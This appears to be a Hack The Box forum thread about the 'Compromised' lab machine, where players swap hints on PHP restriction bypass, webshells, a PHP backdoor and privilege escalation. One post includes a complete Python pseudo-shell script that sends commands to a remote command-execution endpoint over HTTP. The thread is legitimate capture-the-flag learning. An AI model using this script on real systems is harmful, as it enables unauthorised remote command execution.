Official Compromised Discussion

Comments

  • @b3nd0 said:

    @LMAY75 Yea I tried my damnedest to not ask for help, but I had to ask taz too. Makes me laugh when I imagine the day he must have on here, like a drill instructor walking through a field of shenanigans:

    "Code with two hands boy, this isn't a rap concert. Private, why will your exploit not fire?...your magazine is upside down son! How did YOU end up on your own botnet?"

    :lol: :smile: :lol: :love:

    TazWake

    Happy to help people but PLEASE explain your problem in as much detail as possible!

    Also: https://www.nohello.com/

  • edited October 1

    @TazWake said:

    @b3nd0 said:

    @LMAY75 Yea I tried my damnedest to not ask for help, but I had to ask taz too. Makes me laugh when I imagine the day he must have on here, like a drill instructor walking through a field of shenanigans:

    "Code with two hands boy, this isn't a rap concert. Private, why will your exploit not fire?...your magazine is upside down son! How did YOU end up on your own botnet?"

    :lol: :smile: :lol: :love:

    As a JROTC guy I find this especially funny

    LMAY75
    Always happy to help, DM me if you need anything!

  • @LMAY75 said:

    @TazWake said:

    @b3nd0 said:

    @LMAY75 Yea I tried my damnedest to not ask for help, but I had to ask taz too. Makes me laugh when I imagine the day he must have on here, like a drill instructor walking through a field of shenanigans:

    "Code with two hands boy, this isn't a rap concert. Private, why will your exploit not fire?...your magazine is upside down son! How did YOU end up on your own botnet?"

    :lol: :smile: :lol: :love:

    As a JROTC guy I find this especially funny

    To round off the comedy, 15 years ago I was a basic training sergeant/instructor.

    TazWake

  • I need a nudge. phpinfo saddened me deeply on my way to foothold and I do not know how to proceed.

    sparrow1

  • @sparrow1 said:

    I need a nudge. phpinfo saddened me deeply on my way to foothold and I do not know how to proceed.

    There is a way to bypass the things which are disabled. It's googleable.

    TazWake

  • @TazWake said:

    @LMAY75 said:

    @TazWake said:

    @b3nd0 said:

    @LMAY75 Yea I tried my damnedest to not ask for help, but I had to ask taz too. Makes me laugh when I imagine the day he must have on here, like a drill instructor walking through a field of shenanigans:

    "Code with two hands boy, this isn't a rap concert. Private, why will your exploit not fire?...your magazine is upside down son! How did YOU end up on your own botnet?"

    :lol: :smile: :lol: :love:

    As a JROTC guy I find this especially funny

    To round off the comedy, 15 years ago I was a basic training sergeant/instructor.

    How did you go from that to infosec

    LMAY75

  • @LMAY75 said:

    How did you go from that to infosec

    It was only a posting so after 2 years I returned to my trade.

    TazWake

  • Finally got root. This one was really hard for me but mostly because I'm not very good on the vector needed for privesc. BTW, if anyone knows about good resources to work on that, please DM me.

    +1 respect to @TazWake and @c4ph00k for their help! Thx guys!

    Feel free to send me a DM if you need some help. Just remember to tell me what you have already done so I don't spoil anything.

  • Really struggling with the exploit, have the creds already, but can't do anything from there. Anybody can pm or give a little hint?

  • @LegendHacker said:

    Really struggling with the exploit, have the creds already, but can't do anything from there. Anybody can pm or give a little hint?

    This box is marked HARD. The flow seems a bit easy/classic but it cannot work out of the box otherwise the box would be easy. So you may be onto the right thing but the usual functions and checks you'd expect to use will not work. Find alternative functions or google for alternative functions to what you'd expect to work, but which doesn't work.

    Also, not showing any output doesn't mean it didn't work.

    lebutter
    eCPPT | OSCP

  • The flow is rather classic but the path is tortuous (at least it was for me). I needed hints, thanks @TazWake.
    For those who found @sparkla's script useful, check this one out https://github.com/mxrch/webwrap (a wee bit better).
    My 2cents (everything has been said!):
    Foothold: if you want to get a shell, bypassing the restrictions in place is googleable.
    User1: one function will help you do what you need to do to get access. You can land directly here without the foothold above.
    User2: enum.
    Root: quite a common backdoor.

  • What is wrong with the box rn? It is not curling my links. Not even curl localhost

  • Nothing is wrong. It is supposed to be like that.

    sparrow1

  • apart from re**r*ng any other way to do privesc ?

  • @niting3c said:

    apart from re**r*ng any other way to do privesc ?

    Not as far as I am aware.

    TazWake

  • edited October 17

    @niting3c said:

    apart from re**r*ng any other way to do privesc ?

    It's rlly not that bad. Basically plug and play with ghidra, wouldn't even consider it reversing.

    LMAY75

  • Third time the website "disappears" even though the box is pingable. Even resetting doesn't fix the issue. What's wrong ?

  • Finally I managed to get root.
    Thanks for great machine @D4nch3n. I learned something new especially about php backdoors. Also searching for compromise leftovers was something new for me - guess I wouldn't be a good sysadmin :wink:
    Many thanks @TazWake and @LMAY75 for your great hints along the way.

    sparrow1

  • edited October 22

    Umm, Hey guys just started the box today found the backup and an exploit for "l*** c***" but it requires the user credentials. Can someone help or if I am going down a rabbit hole please alert me!!

    Edit: I got the user name for " l*** c*** "

  • @shubhanshu7 said:

    Umm, Hey guys just started the box today found the backup and an exploit for "l*** c***" but it requires the user credentials. Can someone help or if I am going down a rabbit hole please alert me!!

    You are on the right track, enumerate through the backup.. as other comments have mentioned it is very worthwhile learning grep, find, locate to help with your searching. Another helpful comment was pay attention to dates :)

    Africanhippo

  • Rooted. If you need some help, DM me.

    User: Find correct vuln web to upload webshell and search some creds with webshell.
    Root: think like a "heartbleed". It's not about the heartbleed. Only exploitation type is similar.

  • Finally rooted after a few very long days! Thank you @gunroot and @LMAY75 for the nudges. Some of the tips on here are exactly what you need! Enumeration is a big part to the box. Information for user1 can be found in multiple places.. one of which you have probably used already ;)

    Happy to help nudge if you need help, provide what you have done and where you are up to in a PM.

    Africanhippo

  • Really interesting box.
    I learnt something trying to get a webshell, but it's entirely not necessary (and it's probably easier not to get a webshell).

    I found it useful to rewrite what was changed and print it, as I had all the letters right but not the order.

  • I can read files list directories but I am coming empty. I see couple of users that have bash in passwd but I am not finding info to compromise those users. Any hints would be appreciated

  • edited November 1

    Real fun box, I got stuck at root, thanks to @LMAY75 for the nudge.
    In hindsight, it was obvious.

    I loved scripting to own this box, this is my take on the "Not A Reverse Shell", nothing new but since nobody posted something similar (having history, history search and emacs style special keys).

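    #!/usr/bin/env python3
    """Not A Reverse Shell: a line-oriented pseudo shell over HTTP GET requests."""
    import cmd

    import requests

    # Placeholders from the post: the endpoint and the query parameter carrying the command.
    TARGET = "http://YOURRCE"
    CMD_ARG = "YOURCMDARG"


    def execute(line):
        """Send one command line to TARGET and return the response body."""
        try:
            r = requests.get(TARGET, params={CMD_ARG: line}, timeout=10)
        except requests.RequestException as exc:
            # Keep the prompt alive on timeouts and connection errors.
            return f"nars> ERROR: request failed: {exc}"
        if r.status_code == 200:
            return r.text
        return f"{r.text}\r\nnars> ERROR: http response code was {r.status_code}"


    class NotAReverseShell(cmd.Cmd):
        # cmd.Cmd uses readline when available, which gives history,
        # history search and emacs-style key bindings.
        prompt = "nars> "

        def do_help(self, line):
            print("Not A Reverse Shell, a pseudo shell when you cannot have one.")

        def default(self, line):
            # Any input that is not a built-in command is sent to the target.
            print(execute(line))

        def do_EOF(self, line):
            # Ctrl-D: print a newline and leave the loop.
            print()
            return True

        def do_exit(self, line):
            return True

        def do_quit(self, line):
            return True


    if __name__ == "__main__":
        NotAReverseShell().cmdloop()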
    

    Beautiful box!

  • @shubhanshu7 said:

    Umm, Hey guys just started the box today found the backup and an exploit for "l*** c***" but it requires the user credentials. Can someone help or if I am going down a rabbit hole please alert me!!

    You are on the right track, enumerate through the backup.. as other comments have mentioned it is very worthwhile learning grep, find, locate to help with your searching. Another helpful comment was pay attention to dates :)

    Thanks man!! was off from htb for quite a time but gonna try it

  • damnnn...... I just don't know at this point. It's been a while I'm stuck on the my*** user and can't move forward. I saw hints pointing to the home dir of the user, but I couldn't find anything too useful. Any hints?

  • @iWillBeFamous said:

    damnnn...... I just don't know at this point. It's been a while I'm stuck on the my*** user and can't move forward. I saw hints pointing to the home dir of the user, but I couldn't find anything too useful. Any hints?

    This won't cheer you up but look closer at the things you think aren't too useful.

    TazWake

  • Got root! Thanks @TazWake for hint at user stage.
